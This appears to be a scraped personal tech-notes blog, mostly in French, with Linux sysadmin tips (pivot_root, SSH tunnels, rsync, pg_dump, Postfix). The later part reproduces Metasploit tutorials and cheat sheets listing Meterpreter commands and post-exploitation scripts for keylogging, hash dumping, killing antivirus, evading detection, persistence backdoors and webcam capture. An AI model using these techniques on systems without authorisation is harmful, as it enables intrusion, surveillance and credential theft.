Là, deux choix s’offrent à nous : votre partition racine peut être contenue dans votre ram (c’est le plus simple) ou bien vous n’avez pas assez de ram et du coup va falloir recréer de 0 ( j’aborderai pas ce point mais en gros soit vous ne prenez que le strict nécessaire de votre rootfs, soit vous n’avez qu’à pécho un rootfs sur les interwebz ).

Bon donc cp -ax /{bin,etc,sbin,lib32,lib64,lib} /ramroot puis pour s’économiser de la ram mkdir /ramroot/usr suivi de cp -ax /usr/{bin,sbin,lib32,lib64} /ramroot/usr . Voilà on a tout l’userspace !

Tout ? Non. Il manque plus que les montages “bizarres”.

Bon bah mkdir /ramroot/dev /ramroot/sys /ramroot/proc pour créer les points de montage. Par contre là vu que ça existe déjà sur votre disque dur, on va juste “binder” avec mount –rbind /dev /ramroot/dev puis mount –rbind /proc /ramroot/proc et mount -t proc none /ramroot/proc et là c’est tout bon.

Le grand saut
Bon bah vous avez un bien bel userspace de dispo dans votre ramdisk. On peut donc se décider à migrer dedans.

Premièrement mkdir /ramroot/oldroot va accueillir notre skeudur. Et maintenant la commande miraculeuse.

pivot_root /ramroot /ramroot/oldroot

Et là votre racine est désormais votre ramdisk. Maintenant vous pouvez umount /dev/sda2 et admirer votre dur boulot.

Vous pouvez faire ce que vous vouliez faire désormais. C’est beau, hein ? Au final c’est diablement simple et super efficace.

Vous voulez revenir sans rebooter ? Easy vous n’avez qu’à mount /dev/sda2 /oldroot et enfin pivot_root /oldroot /oldroot/ramroot et pouf vous voilà hors de votre ramdisk de retour sur votre partoche.

Auteur : lord

Auteur : Harlok

2019-04-16 21:54:09

Changer la couleur de fond de son terminal (FR)

Ça vous arrive combien de fois de plus savoir si vous êtes sur une session ssh distante ou si vous êtes sur un terminal local ? Pour moi ça m’arrive constamment. Enfin ça m’arrivait. J’ai trouvé une petite astuce qui change tout : Changer le background d’un terminal à la volée !

Et ouai il existe un séquence d’échappement qui permet de faire ce petit miracle à condition que votre terminal le gère (par exemple xterm et très bientôt alacritty). La séquence magique est \033]11;#rrggbb\007 . Voilà voilà.

Comment utiliser ça ? Easy ! Vous éditez votre /etc/ssh/ssh_config et vous mettez

PermitLocalCommand yes
LocalCommand /bin/echo -e "\033]11;#440044\007"
et là bam : à la prochaine connexion ssh un magnifique fond violet vous sautera à la gueule. Toute fois, cela empêchera le scp, méfiance. Par contre comment remettre le fond comme il faut au retour ? Là il faut ruser un poil, on vera après. Vous pouvez également faire en sorte de mettre une couleur différente par destination ssh, soit du côté client en modifiant votre ~/.ssh/config mais du coup c’est un poil chiant car local, soit en modifiant le script d’initialisation du shell distant. Perso je rajoute le fameux echo dans le /etc/zsh/zshrc avec des couleurs différentes. Comme ça, quelque soit la machine d’origine ça fonctionne.

Bon pour récup la couleur d’origine faut feinter. Dans mon cas j’utilise zsh. Dans ce zsh j’ai rajouté un ptit truc sympa qui permet de chronométrer toutes les commandes que je lance et d’afficher la durée dans le prompt. Pour se faire, j’ai un fichier /etc/zsh/prompt.zsh avec dedans deux fonctions : une preexec() qui définie une variable timer. Et la precmd() qui récupère la variable timer, calcule les secondes écoulées et affiche le résultat dans le RPROMPT. Jusque là rien d’éxotique. Il suffit donc de rajouter le /bin/echo dans la precmd() et le tour est joué. Cette commande étant executée à la fin de chaque commande, en sortant d’une session ssh, vous retrouverez la couleur souhaitée.

C’est presque aussi efficace qu’un mollyguard pour le moment. Par contre à voir si je ne m’y accoutumerais pas trop.
Auteur : lord

Auteur : Harlok

2019-04-03 10:52:20

Term to test (FR)

Parceque c’est le plus drôle de tous, il a le droit à une petite place ici : Cancer. Ouaip Cancer terminal. C’est fin et joyeux. Il est en rust et plutôt simple. Il gère sixel c’est assez marrant mais franchement gadget. Je l’ai pas testé plus que ça.

Un de mes chouchoux est st. C’est un term très simple. Pas de fichier de conf. Si on veux modifier un règlage il faut le faire dans le config.h et recompiler. Et au final ce fichier est suffisamment bien foutu et la compilation est tellement rapide que c’est pas vraiment plus long que d’éditer un fichier de conf habituel. Je l’ai très longtemps utilisé. C’est fait par les braves gars de chez Suckless qui ont à cœur de développer des outils le moins bloatés possibles avec très peu de lignes de codes. Il est rapide et gère même le truecolor. Par contre pas de scrollback, ça peut gêner au début mais on s’y fait très bien. Je l’ai gardé quelques années sans soucis.

Mais j’ai découvert un ptit nouveau, le surprenant Alacritty. Il est simple, pas de GUI, un ptit fichier de conf bien commenté, peu de features à la noix et un peu plus gourmand que St. Codé en rust, sa particularité est d’être le plus rapide. Et bha… c’est vrai qu’il est rapide le con ! Tout l’affichage est en fait en OpenGl. Mais du coup lui faire bouffer des dizaines de lignes devient instantanné. On peut même refaire mumuse avec la libcaca en “Haute résolution” (ouai en choisissant une font toute petite pour avoir des pixels assez petits et c’est plutôt fluide). Il est très jeune et du coup encore un peu brut de décoffrage (des ptits soucis graphiques dans de très rares cas) mais du coup il est possible d’influencer un peu son developpement. Une petite communauté s’est déjà formée. Je pense qu’il a pas mal d’avenir. Bref c’est mon nouveau jouet du moment.

Auteur: lord

Auteur : Harlok

2019-04-03 10:54:21


Quelques tips pour bien utiliser la commande patch.

La commande diff
Cette commande permet de trouver les differences entre 2 fichiers. Elle vous retourne la ligne du fichier original et la ligne modifiée. Elle va nous permettre de créer le patch que nous pourrons ensuite appliquer. Il existe plusieurs types de patch. Celui qui est le plus répandu est le patch unifié car il apporte de la souplesse dans son application en permettant une certaine variation du fichier à patcher.

La commande patch
La commande patch va prendre en entré le resultat de la commande diff et va appliquer les changements sur le fichier désigné. Le fait d’avoir dans le patch la version originale et la version modifiée permet d’éviter de patcher un fichier qui n’est pas le bon, ou même de patcher un fichier déjà à jour.

Exemple :
diff -aburN --exclude=CVS* repertoire/reference/ repertoire/modifie/ > patch.diff
Cette commande crée un patch unifié. Interêt des options passées :

-a : traiter tout les fichiers comme du texte
-b : permet de ne pas tenir compte des différences sur les espaces
-u : faire un patch unifié
-r : parcourrir les sous répertoires
-N : permet de gérer les fichiers nouveaux
—exclude=CVS : permet d’exclure des fichiers ou répertoire de l’analyse.
Le patch ainsi fabriqué contient des éléments qui vont permettre à la commande patch de retrouver les fichiers à modifier à travers l’arborescense, puis de trouver les bonnes lignes, même si celles-ci ont légèrement été déplacées.

patch -p 1 < patch.diff
L’option -p N permet d’adapter l’aborescence d’origine du patch à l’arborescence que l’on est en train de traiter.

Auteur : Harlok

2019-04-03 10:55:40


Pour toutes les manipulations qui suivent, il faut être connecté en tant qu’utilisateur postgres :

%> su - postgres
Dumper une base
La commande pg_dump permet d’afficher la structure d’une base nom_de_la_base ainsi que ses données sur la sortie standard.

En utilisant une redirection de la sortie standard vers un fichier, on réalise donc une copie de la base.

%> pg_dump -D {nom_de_la_base} > {nom_du_fichier.dump}
Recréer une base à partir d’un dump
S’il y a besoin de restaurer une base, ou d’en construire une nouvelle à partir d’une base existante, il faut utiliser un fichier de dump.

Dans un premier temps, effacer la base existante si besoin :

%> dropdb {nom_de_la_base}
Dans un deuxième temps, recréer ou créer la base :

%> createdb {nom_de_la_base}
Dans un troisième temps, importer dans la base le fichier de dump :

%> psql -e {nom_de_la_base} < {nom_du_fichier.dump}
Pour importer le dump, on peut aussi le faire en étant connecté à la base (utile lorsque le postmaster demande une authentification par mot de passe [1]) en utilisant la commande psql :

nom_de_la_base=# \i {nom_du_fichier.dump}
Ainsi la base est créée et initialisée avec la structure et les données déclarées dans le fichier de dump. Celui-ci étant en mode texte il est trés facile de le modifier avec un éditeur.

PS : Dans tous les cas, pour que cela fonctionne, il faut que le serveur de base de donnés PostgreSQL fonctionne sur la machine. C’est une erreur courante que d’oublier de le démarrer.

[1] car dans ce cas là, on ne peut pas faire la redirection de l’entrée standart

Auteur : Harlok

2019-04-03 10:55:04


Le but de ce document est d’expliquer les tunnels SSH. C’est à dire comment utiliser SSH pour faire passer différents protocoles, ce qui permet de sécuriser la communication (une sorte de VPN software). Si vous souhaitez plus de détails sur les différentes possibilités, cet article de Buddhika Chamith vous éclairera : SSH Tunneling Explained.

Quand on se connecte à Internet depuis un lieu public et si ce lieu de connexion ne permet pas d’accéder à des ports particuliers d’un serveur (règles de firewall restrictives), il est possible d’utiliser un serveur intermédiaire sur lequel on a un compte utilisateur et qui fait tourner un serveur ssh. C’est ce serveur qui se connectera au serveur désiré. Cette solution va aussi permettre de chiffrer la communication entre le point d’accès et le serveur intermédiaire.

Pour réaliser cela, on va utiliser un tunnel SSH. Il faut donc que l’on ai accès au port 22 du serveur intermédiaire, mais dans 90% des cas les firewalls laissent sortir le trafic sur ce port.

Le principe
Il faut créer une connexion ssh entre le pc client et le serveur intermédiaire. Cette connexion (le tunnel donc) connectera un port du pc client au serveur intermédiaire. Celui-ci va lire tout ce qu’il reçoit depuis cette connexion et re-expédier le tout vers le serveur destinataire.

attention : sous Linux, on ne peut pas connecter le tunnel sur un port local privilégié si on n’est pas root. Il faut donc prendre un port au dessus de 2000.

Je veux lire mes mails par un accés imap. Mon serveur imap est et je l’interroge sur le port 143 (le porte par défaut IMAP). Mais le firewall ne laisse pas sortir les connexions vers le port 143.

Je vais donc établir un tunnel SSH entre le pc que j’utilise et un serveur sur lequel j’ai un accés ssh. Ce serveur s’appelle et j’ai un compte utilisateur de login moncompte. Je vais connecter le tunnel sur le port 2000 de mon pc client, comme suit :

ssh -2NfC

Cette commande ne me connecte pas sur le serveur intermédiaire, mais me rend la main de suite grâce a l’option -f combinée avec l’option -N. L’option -2 c’est pour demander à ssh d’utiliser le protocole v2 et l’option -C c’est pour demander de compresser le tunnel.

Il ne me reste plus qu’à brancher mon client mail sur le port 2000 de localhost, et je pourrai lire mes mails, comme si j’étais connecté directement au serveur de mails.

Un détail sécurité
Quand je créé des comptes utilisateurs sur mon serveur juste pour permettre du port forwarding je ne donne pas le droit de connexion au serveur. Pour cela, dans le fichier /etc/passwd je remplace le shell du compte par /sbin/nologin. Ainsi la personne qui a ce compte peut créer des tunnels SSH mais elle ne peut pas se connecter au serveur.

Sous Windows
En utilisant Cygwin et le client ssh fourni avec, cela fonctionne très bien. Putty permet aussi d’établir des tunnels pour ceux qui sont réfractaires à la ligne de commande.

Quelques liens sur le sujet
Remote Desktop and SSH tunneling,
X over SSH2,
Documentation sur Putty en francais avec une section sur le transfert de ports
Faire un backup avec rsync
On peut utiliser ssh pour faire un backup d’une machine distante (pratique pour conserver une copie d’un site web, en ne téléchargeant que ce qui a changé depuis le dernier backup) avec rsync

rsync -v -u -a --rsh=ssh --stats /chemin/dossier/local

Auteur : Harlok

2019-04-16 22:03:45

Ouvrir le tunnel (FR)

Pour cela, rien de plus simple, tu prends ta ligne de commande et tu tapes :

~$ ssh -fC -D 8080

Avec cette commande tu tu connectes en tant qu’utilisateur ‘tunnel‘ sur la machine ‘‘ et le tunnel est accessible en local sur le port 8080. Pour vérifier que le tunnel soit bien là :

~$ netstat -apnt

(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0* LISTEN -
tcp 0 0* LISTEN 4464/ssh
Nous sommes content, il y a bien SSH sur le port 8080.

Vérifier notre IP
Avant d’utiliser le proxy, nous allons vérifier notre adresse IP publique. Car une fois que le navigateur sera configuré pour utiliser le proxy, elle devra être différente et correspondre à l’adresse IP du serveur SSH utilisé.

Il existe une foule de service pour découvrir son adresse IP :

Configurer Firefox pour utiliser le proxy SOCKS

Dans Firefox, ouvrir le menu “Edit > Preferences” et dans la fenêtre de dialogue choisir l’onglet “Advanced” puis “Network” et finalement le bouton “Settings” :

Firefox Preferences

Choisir l’option “Manual proxy configuration”, cela active toute une série de champs de saisies. Dans le champ “SOCKS Host” y mettre “”, notre adresse de loopback (à adapter selon configuration) et dans le champ “Port” y mettre “8080” qui est le port d’écoute du tunnel. Ensuite bien s’assurer que “SOCKS v5” est sélectionné, ainsi :

Connection Settings

Tu penses en avoir fini, mais non, il manque le dernier détail qui tue : proxifier les requêtes DNS. En effet, sur Firefox elles ne passent pas par défaut via le proxy SOCKS. Il parait que d’autres navigateurs le font. Mais pour Firefox, il faut lui forcer la main. Pour cela, ouvrir (1) “about:config” (saisir “about:config” dans la barre d’adresse) puis rechercher (2) l’entrée “network.proxy.socks_remote_dns” qui est à “false” par défaut. Double cliquer (3) sur la ligne correspondante pour passer la valeur à “true” :

about:config - Mozilla Firefox

Tu retournes sur ton site préféré pour découvrir ton adresse IP et voilà : découvre mon adresse IP - Après proxy

Tout est pour le mieux dans le meilleur des mondes.

Note : Il n’y a pas que Firefox dans la vie. Pour lancer Chromium en mode incognito et pour qu’il utilise le proxy SOCKS sans fuite DNS, d’après cette page du site il faut faire ainsi :

~$ chromium-browser --incognito --proxy-server="socks5://" --host-resolver-rules="MAP *"

Auteur : Harlok

2019-04-16 21:22:36

Postfix queue

How to: Purge, Flush or Delete Postfix Queue, or a Single Email
Written by Guillermo Garron
Date: 2012-04-25 14:53:30 00:00

To flush or purge the postfix mail queue, just enter this command

postfix -f

But if you need to delete an individual email from the queue, you'll first need to see the queue. Traditionally you use mailq this time we'll use:

postqueue -p

And the output should show all messages in queue:

5642B4D8647* 1683500 Tue Jun 3 08:37:27

9359B4D82B1* 1635730 Tue Jun 3 08:36:53

The first number is the message ID, if you only want to delete one of them, enter:

postsuper -d 5642B4D8647

That will only delete one email for the queue, that specific email you want to delete from it.

If you want to delete all deferred mails, you can use:

postsuper -d deferred

Auteur : Harlok

2018-08-02 09:09:11


rsync options source destination
-v : verbose
-r : copies data recursively (but don’t preserve timestamps and permission while transferring data
-a : archive mode, archive mode allows copying files recursively and it also preserves symbolic links, file permissions, user & group ownerships and timestamps
-z : compress file data
-h : human-readable, output numbers in a human-readable format
-e : specify a protocol

rsync -zvh backup.tar /tmp/backups/
rsync -avzh /root/rpmpkgs /tmp/backups/
rsync -avz rpmpkgs/ root@
rsync -avzh root@ /tmp/myrpms
rsync -avzhe ssh root@ /tmp/
rsync -avzhe ssh backup.tar root@
Add a port :
rsync -avzhe "ssh -p1234" backup.tar root@

These two options allows us to include and exclude files by specifying parameters with these option helps us to specify those files or directories which you want to include in your sync and exclude files and folders with you don’t want to be transferred.

rsync -avzhe ssh --progress /home/rpmpkgs root@
rsync -avze ssh --include 'R*' --exclude '*' root@ /root/rpm

We can use ‘–delete‘ option to delete files that are not there in source directory.

rsync -avz --delete root@ .

rsync --dry-run --remove-source-files -zvh backup.tar /tmp/backups/

Set Bandwidth Limit and Transfer File

rsync --bwlimit=100 -avzhe ssh /var/lib/rpm/ root@

Also, by default rsync syncs changed blocks and bytes only, if you want explicitly want to sync whole file then you use ‘-W‘ option with it.

rsync -zvhW backup.tar /tmp/backups/backup.tar


Auteur : Harlok

2019-05-04 22:00:04

Terminal Emulator Keyboard Shortcuts

Split Terminal Horizontally – Ctrl+Shift+0
Split Terminal Vertically – Ctrl+Shift+E
Move Parent Dragbar Right – Ctrl+Shift+Right_Arrow_key
Move Parent Dragbar Left – Ctrl+Shift+Left_Arrow_key
Move Parent Dragbar Up – Ctrl+Shift+Up_Arrow_key
Move Parent Dragbar Down – Ctrl+Shift+Down_Arrow_key
Hide/Show Scrollbar – Ctrl+Shift+s
Search for a Keyword – Ctrl+Shift+f
Move to Next Terminal – Ctrl+Shift+N or Ctrl+Tab
Move to the Above Terminal – Alt+Up_Arrow_Key
Move to the Below Terminal – Alt+Down_Arrow_Key
Move to the Left Terminal – Alt+Left_Arrow_Key
Move to the Right Terminal – Alt+Right_Arrow_Key
Copy a text to clipboard – Ctrl+Shift+c
Paste a text from Clipboard – Ctrl+Shift+v
Close the Current Terminal – Ctrl+Shift+w
Quit the Terminator – Ctrl+Shift+q
Toggle Between Terminals – Ctrl+Shift+x
Open New Tab – Ctrl+Shift+t
Move to Next Tab – Ctrl+page_Down
Move to Previous Tab – Ctrl+Page_up
Increase Font size – Ctrl+(+)
Decrease Font Size – Ctrl+(­)
Reset Font Size to Original – Ctrl+0
Toggle Full Screen Mode – F11
Reset Terminal – Ctrl+Shift+R
Reset Terminal and Clear Window – Ctrl+Shift+G
Remove all the terminal grouping – Super+Shift+t
Group all Terminal into one – Super+g

Auteur : Harlok

2018-07-18 08:29:18

Metasploit Background & Installation

Metasploit was developed by HD Moore as an open source project in 2003. Originally written in Perl, Metasploit was completely rewritten in Ruby in 2007. In 2009, it was purchased by Rapid7, an IT security company that also produces the vulnerability scanner Nexpose.

Metasploit is now in version 4.9.3, which is included in our Kali Linux. It's also built into BackTrack. For those of you using some other version of Linux or Unix (including Mac OS), you can download Metasploit from Rapid7's website.

For those of you using Windows, you can also grab it from Rapid7, but I do not recommend running Metasploit in Windows. Although you can download and install it, some of the capabilities of this hacking framework do not translate over to the Windows operating system, and many of my hacks here on Null Byte will not work on the Windows platform.
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Metasploit now has multiple products, including Metasploit Pro (the full commercial version) and the Community edition that is built into Kali and remains free. We will focus all of our efforts on the Community edition, as I am well aware that most of you will not be buying the $30,000 Pro edition.
Ways to Use Metasploit

Metasploit can be accessed or used in multiple ways. The most common method, and the one I use, is the interactive Metasploit console. This is the one that is activated by typing msfconsole at the command line in Kali. There are several other methods as well.

First, you can use Metasploit from the command line, or in msfcli mode. Although it appears that when we are in the console that we are using the command line, we are actually using an interactive console with special keywords and commands. From the msfcli, we ARE actually using a Linux command line.

We can get the help screen for msfcli by typing:

kali > msfcli -h
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Now to execute an exploit from the msfcli, the syntax is simply:

kali > msfcli payload = rhost = lhost = E

Where E is short for execute.

In my tutorial on creating payloads to evade AV software, we are using the msfencode and msfpayload command in the command line (msfcli) mode.

The drawback to using the msfcli is that it is not as well-supported as the msfconsole, and you are limited to a single shell, making some of the more complex exploits impossible.

If you want to use Metasploit with a GUI (graphical user interface), at least a couple of options are available. First, Raphael Mudge has developed the Armitage (presumably a reference to a primary character in the seminal cyberhacking science fiction work, Neuromancer—a must read for any hacker with a taste for science fiction).

To start Armitage in Kali, simply type:

kali > armitage
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

If Armitage fails to connect, try these alternative commands:

kali > service start postgresql
kali > service start metasploit
kali > service stop metasploit
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Armitage is a GUI overlay on Metasploit that operates in a client/server architecture. You start Metasploit as a server and Armitage becomes the client, thereby giving you full access to Metasploit's features through a full featured—thought not completely intuitive—GUI. If you really need a GUI to feel comfortable, I don't want to discourage you from using Armitage, but mastering the command line is a necessity for any self-respecting hacker.
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Metasploit has six different types of modules. These are:


Payloads are the code that we will leave behind on the hacked system. Some people call these listeners, rootkits, etc. In Metasploit, they are referred to as payloads. These payloads include command shells, Meterpreter, etc. The payloads can be staged, inline, NoNX (bypasses the No execute feature in some modern CPUs), PassiveX (bypasses restricted outbound firewall rules), and IPv6, among others.

Exploits are the shellcode that takes advantage of a vulnerability or flaw in the system. These are operating system specific and many times, service pack (SP) specific, service specific, port specific, and even application specific. They are classified by operating system, so a Windows exploit will not work in a Linux operating system and vice versa.

Post are modules that we can use post exploitation of the system.

Nops are short for No OPerationS. In x86 CPUs, it is usually indicated by the hex 0x90. It simply means "do nothing". This can be crucial in creating a buffer overflow. We can view the nops modules by using the show command.

msf > show nops
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Auxiliary includes numerous modules (695) that don't fit into any of the other categories. These include such things are fuzzers, scanners, denial of service attacks, and more. Check out my article on auxiliary modules for more in-depth information for this module.

Encoders are modules that enable us to encode our payloads in various ways to get past AV an other security devices. We can see the encoders by typing:

msf > show encoders
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

As you can see, there are numerous encoders built into Metasploit. Once of my favorites is shikata_ga_nai, which allows us to to XOR the payload to help in making it undetectable by AV software and security devices.

Ever since Metasploit 4 was released, Metasploit has added search capabilities. Previously, you had to use the msfcli and grep to find the modules you were looking, but now Rapid7 has added the search keyword and features. The addition of the search capability was timely as Metasploit has grown dramatically, and simple eyeball searches and grep searches were inadequate to search over 1,400 exploits, for instance.

The search keyword enables us to do simple keyword searches, but it also allows us to be a bit more refined in our search as well. For instance, we can define what type of module we are searching for by using the type keyword.

msf > search type:exploit
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

When we do so, Metasploit comes back with all 1,295 exploits. Not real useful.

If we know we want to attack a Sun Microsystems machine running Solaris (Sun's UNIX), we may want may to refine our search to only solaris exploits, we can then use platform keyword.

msf > search type:exploit platform:solaris
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Now we have narrowed our search down to only those exploits that will work against a Solaris operating system.

To further refine our search, let's assume we want to attack the Solaris RPC (sunrpc) and we want to see only those exploits attacking that particular service. We can add the keyword "sunrpc" to our serach like below:

msf > search type:exploit platform:solaris sunrpc

source :

Auteur : Harlok

2018-07-12 15:42:33

Command Cheat Sheet for Metasploit

Step 1: Core Commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel

Step 2: File System Commands

cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim

Step 3: Networking Commands

ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table

Step 4: System Commands

clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name

Step 5: User Interface Commands

enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components

Step 6: Privilege Escalation Commands

getsystem - uses 15 built-in methods to gain sysadmin privileges

Step 7: Password Dump Commands

hashdump - grabs the hashes in the password (SAM) file

Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.
Step 8: Timestomp Commands

timestomp - manipulates the modify, access, and create attributes of a file

source :

Auteur : Harlok

2018-07-12 15:42:24

The Ultimate CLI List Metasploit

Script Commands with Brief Descriptions

arp_scanner.rb - Script for performing an ARP's Scan Discovery.
autoroute.rb - Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb - Script for injecting a reverce tcp Meterpreter Payload into memory of multiple PIDs, if none is provided a notepad process will be created and a Meterpreter Payload will be injected in to each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb - This script will enumerate windows hosts in the target environment given a username and password or using the credential under which Meterpeter is running using WMI wmic windows native tool.
scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively search and download files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.

source :

Auteur : Harlok

2018-07-12 15:42:14

Bash Arguments

- You can use $_ or !$ to recall the last argument of the previous command.
- Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.) !:1-2 !:10-12
- Similar to !$, you use !^ for the first argument.
- !$ - last argument from previous command
- !^ - first argument (after the program/built-in/script) from previous command
- !! - previous command (often pronounced "bang bang")
- !n - command number n from history
- !pattern - most recent command matching pattern
- !!:s/find/replace - last command, substitute find with replace
- Use following to take the second argument from the third command in the history,
- Use following to take the third argument from the fifth last command in the history,
- !* runs a new command with all previous arguments.

Event Designators

An event designator is a reference to a command line entry in the history list. Unless the reference is absolute, events are relative to the current position in the history list.


Start a history substitution, except when followed by a space, tab, the end of the line, ‘=’ or ‘(’ (when the extglob shell option is enabled using the shopt builtin).

Refer to command line n.

Refer to the command n lines back.

Refer to the previous command. This is a synonym for ‘!-1’.

Refer to the most recent command preceding the current position in the history list starting with string.

Refer to the most recent command preceding the current position in the history list containing string. The trailing ‘?’ may be omitted if the string is followed immediately by a newline.

